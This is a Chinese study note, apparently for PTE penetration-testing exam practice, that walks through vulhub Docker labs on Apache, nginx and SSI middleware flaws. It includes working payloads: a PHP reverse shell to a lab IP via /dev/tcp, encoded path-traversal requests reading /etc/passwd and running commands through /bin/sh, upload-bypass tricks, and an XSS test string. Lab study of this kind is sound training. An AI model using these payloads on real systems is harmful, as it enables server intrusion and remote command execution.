PTE-中间件安全

DOCKER环境,一般是80 8080 8081端口

1 apache位置扩展名解析漏洞

cd vulhub-master/httpd/apache_parsing_vulnerability/
docker-compose up -d

修改一句话的后缀 直接上传

蚁剑

2 CVE-2017-15715

docker-compose stop
cd ..
cd CVE-2017-15715/
docker-compose up -d

在提交的时候抓包

在文件名后加+ 然后到HEX下把对应的2b改成0a, 放过去

直接访问不行,因为$匹配OA 注意这里0A要大写

能过黑名单,不能过白名单

3 SSI远程命令执行漏洞(服务器端包含)

docker-compose stop
cd ..
cd ssi-rce
docker-compose up -d

开ssi-rce

写shtml

直接上传

点击访问

需要查什么可以通过修改命令

但是再docker1中

4 nginx解析漏洞 过白名单

5 nginx文件名逻辑漏洞 过白名单

上传时抓包 文件名后加空格

正常访问不到,和视频不一样

6 可以反向shell <?php system("bash -c 'bash -i &>/dev/tcp/192.168.100.137/10086 0>&1'");?>

上传也要加空格,同上,访问也一样

访问前开监听,访问后可以连到服务器

6

%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd

GET /icons/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1

POST /cgi-bin/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1

Host: 192.168.100.131:8080

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3

Accept-Encoding: gzip, deflate

Connection: close

Upgrade-Insecure-Requests: 1

If-Modified-Since: Mon, 11 Jun 2007 18:53:14 GMT

If-None-Match: "2d-432a5e4a73a80"

Cache-Control: max-age=0

Content-Length: 7

echo;id

GET /icons/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd HTTP/1.1

<script>alert('xss')</script>

相关推荐
WTT001115 分钟前
2024楚慧杯WP
大数据·运维·网络·安全·web安全·ctf
群联云防护小杜3 小时前
如何给负载均衡平台做好安全防御
运维·服务器·网络·网络协议·安全·负载均衡
ihengshuai3 小时前
HTTP协议及安全防范
网络协议·安全·http
黑客Jack4 小时前
防御 XSS 的七条原则
安全·web安全·xss
云云3215 小时前
怎么通过亚矩阵云手机实现营销?
大数据·服务器·安全·智能手机·矩阵
神一样的老师5 小时前
面向高精度网络的时间同步安全管理架构
网络·安全·架构
云云3217 小时前
云手机方案全解析
大数据·服务器·安全·智能手机·矩阵
云云3218 小时前
云手机能用来干什么?云手机在跨境电商领域的用途
服务器·线性代数·安全·智能手机·矩阵
云云3218 小时前
云手机方案总结
服务器·线性代数·安全·智能手机·矩阵
m0_748237058 小时前
2024年“羊城杯”粤港澳大湾区网络安全大赛 初赛 Web&数据安全&AI 题解WriteUp
前端·安全·web安全